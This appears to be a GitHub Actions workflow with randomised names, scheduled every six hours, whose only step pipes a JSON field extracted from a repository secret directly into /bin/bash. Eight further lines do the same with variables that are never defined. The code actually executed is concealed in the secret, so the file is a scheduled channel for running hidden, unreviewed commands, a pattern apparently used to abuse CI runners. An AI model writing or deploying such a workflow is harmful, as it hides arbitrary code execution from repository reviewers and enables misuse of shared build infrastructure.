name: yuanyaozu5274

on:
  workflow_dispatch:
  schedule:
    - cron: '29 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuanyaozu5274
        env:
          es3: ${{ secrets.es3 }}
        run: |
          echo $es3 | jq -r .xdw555 | /bin/bash
          echo $rcb95 | jq -r .v66220 | /bin/bash
          echo $oxo33084 | jq -r .l3051 | /bin/bash
          echo $gdf83 | jq -r .ys66548 | /bin/bash
          echo $vqj7 | jq -r .d938 | /bin/bash
          echo $oyv65252 | jq -r .ovjpq1 | /bin/bash
          echo $vkaij469 | jq -r .knno7 | /bin/bash
          echo $j5359 | jq -r .yoe558 | /bin/bash
          echo $gajq8 | jq -r .qtwi642 | /bin/bash

